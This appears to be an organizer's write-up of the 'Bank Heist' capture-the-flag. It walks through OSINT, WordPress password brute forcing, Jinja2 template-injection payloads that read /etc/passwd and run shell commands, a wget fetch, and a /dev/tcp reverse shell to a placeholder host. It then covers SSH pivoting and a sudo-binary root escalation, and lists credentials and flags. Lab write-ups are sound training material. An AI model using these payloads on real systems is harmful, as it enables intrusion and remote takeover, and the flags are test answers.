## THEME : THE BANK HEIST
This was a 48 hours CTF that is done anually in Tanzania, it takes place before the H4K-IT event that is done a few days just after the CTF or sometimes right after the CTF.
I am one of the organizers and the authors of this CTF. The CTF was based on a realistic red teaming exercise where the end goal was to gain access over the banking company through their systems. The CTF had a total of 8 challenges with a total of 2800 points.
Congratulations to the winners and to everyone who participated :+1:
## CATEGORY: OSINT
#### CHALLENGE NAME : Welcome To The Bank Heist
Downloading the image that is attached, we are able to get a link when reading the image but since the link has expired the alternative is the link on the description of the challenge:
The link redirects you to a telegram group, once joined the telegram group and reading the description, we can get the flag:
```flag : h4k-it{here-is-something-for-you}```
#### CHALLENGE NAME : Employee
In the telegram group, we get the second hint which is an image containing a lead.
We get the name of the bank as "Bank Of New Africa" (bank-of-new-africa), moving to linkedin and searching `bank-of-new-africa` we get the bank's page
We get that there is a comment, trying to see who liked the comment:
There is one employee that reacted to the comment, let's have a look at his profile:
The flag and the website of the bank
```flag : h4k-it{you-have-come-a-long-way}```
## CATEGORY : WEB
#### CHALLENGE NAME : Think outside the box
After getting the bank's website, then we are now tasked with hacking into that website. https://bonatanzania.com. The website uses wordpress.
First we need to know the username that will allow us to login to the dashboard. Tried enumerating the username with wordpress but the system administrator disabled the rest-api so no username was provided. But that does not stop us from getting the username, using rss feed we are able to get the information about the website and the build date as well as the creator.
https://bonatanzania.com/?feed=rss
We have our user `brandon`, now the next step is bruteforcing the password input to get the actual password and log in. Using wordlists is a waste of time since the password isn't on any of the known wordlists.
With that said , we now move forward to using cewl to scrape for keywords from the website with the command
```bash
cewl https://bonatanzania.com/ > wordlist.txt
```
And then after that we use crunch to perform mutation of numbers and the keywords, though it'll take time but worth it. So to save time, I started with one by one word on the wordlist. "I KNOW RIGHT! BORING!"
```crunch 8 8 -t word%%%% -o out.txt```
now out.txt contains our 1 word wordlist, now we bruteforce using wpscan
The password will then be retrieved, took a while on my side like almost 5 minutes
The password is **BoNA2018** We now proceed to login
Clicking on pages, we can see one page named Checkpoint
Viewing that we get the flag:
```flag : h4k-it{real-hackers-never-end-here}```
#### CHALLENGE NAME : IBankingSystem
To be able to solve this, we first visit `bonatanzania.com` to get the ibanking website which is on the footer of the website.
I perform a dirsearch on the website, and I found `/Admin/Settings`
Opening `/Admin/Settings` we get some leads on `mail-test.bonatanzania.com`
The flag can be found just on the `/Login` page.
```flag : h4k-it{ibanking_l3ts_g000000}```
#### CHALLENGE NAME : MAIL???
Visiting `mail-test.bonatanzania.com` we are responded with a `MAILING SYSTEM`. We also have `/send` which is used to send an email to the recipient which is unknown to us.
Sending the email, I am able to get the flag for the challenge.
```flag : h4k-it{mail_about_to_get_hXXked}```
## CATEGORY : INITIAL FOOTHOLD
#### CHALLENGE NAME : Mail-Root
From the mail-test server, we try to inject the `TESTSERVER` input with a malicious payload, starting with SSTI (server-side-template-injection). We test for SSTI by writting the payload as `{{4*4}}` if the output is `16` then this is vulnerable to SSTI.
The output of the server is `16` now moving further we need to exploit and get reverse shell or at least RCE.
with this payload:
```python
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
```
I was able to read `/etc/passwd`
I move on with RCE by using the payload :
```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}
```
I am able to execute shell commands:
Next Step, reverse shell:
I first a python server that hosts my malicious script and a listener, then I shall download my malicious script inside the mail server once I download it with the RCE that I got, then I proceed to execute it to trigger the reverse shell.
**HOSTING SERVER & LISTENER**
My malicious script contains the following content:
```bash
root@localhost:~/pew# cat pz
bash -c "bash -i &>/dev/tcp/10.10.10.10/1234 <&1"
```
**TARGET MAIL SYSTEM**
I write my payload as :
```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("wget http://10.10.10.10:8000/pz").read() }}
```
*replace 10.10.10.10 with your hosting IP*
When sent, you shall receive the response back at your hosting server
**HOSTING SERVER & LISTENER**
It shows that the mail system just downloaded the file, so now our next step is triggering the reverse shell by executing it.
**TARGET MAIL SYSTEM**
I write the payload:
```python
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash pz").read() }}
```
And then that's it! We got a Reverse Shell!
**HOSTING SERVER & LISTENER**
Reverse shell received, now we read an interesting file `mail.txt`
This file contains the flag:
```flag : h4k-it{pivoting_time}```
## CATEGORY : PIVOTING
#### CHALLENGE NAME : Something Something Rev
From what we have just read in `mail.txt`, there are some sort of credentials tho specifically we do not know where they are used to log into. In this case the next step is to read network and hosts configurations files.
Starting with `/etc/hosts`
we can see that we have `share.bonatanzania.com`, If you try opening this on the web it wont respond because it doesn't exist, thus it's an internal host.
I now try to log in with SSH using those creds into share.bonatanzania.com.
Boom! Logged in! The flag is in `pivot.txt`
```flag : h4k-it{pivoting_is_fun_as_well}```
## CATEGORY : PRIVILEGE ESCALATION
#### CHALLENGE NAME : Network Owner
Now this was my favorite part of this challenge, we first look for the privileges we have in this server as the user `tfarooq`
User can run `/usr/bin/share` as sudo. Let's try see what `/usr/bin/share` does.
It asks for an ID, well we are going to have to copy this binary back to our lab so as we can be able to reverse engineer it and understand it's logic.
using `scp tfarooq@172.105.98.129:/home/tfaraooq/share /path/to/share`
this will download it in your system.
I am going to use radare2 for disassembling.
Running the strings command , I am able to see that there are some keywords `UPX` at the end of the binary meaning that it's packed with upx so we have to unpack the binary to be able to get the clean binary.
Running the command `upx -d share -o share_file` will unpack the binary and output the clean binary as `share_file`
After running `strings` on the clean binary we get the following output showing that it's unpacked
Now we proceed with using radare2, using the command `radare2 -d share_file` and then typing aaa to set an analyze level will load our binary in radare2:
running `afl` to list all functions will show alot of functions that are available:
Let's load up the `main` function with `pdf @main` command:
Reading the outputs we can tell that it takes the id input and saves it in `var_ch` where as it then compares it, if it's less then 211 or greater then 200 if the input is a number inbetween then it proceeds to the next call which takes the input of the user:
So we can see that the user input is now stored in `var_70h` and the password input is stored in `var_e0h` then there is a comparison that is done to check if user input is equal to `admin` and if pass input is equal to `000111AZC` if that's correct then it'll execute the command `sudo su` thus providing us with full root access.
LET'S GIVE IT A GO!
Just as we expected ! we now have root.
```flag : h4k-it{is_it_done??}```
And this is the end of all the challenges!😎
[@tahaafarooq](https://twitter.com/tahaafarooq)
---
Sign in with Wallet
Connect another wallet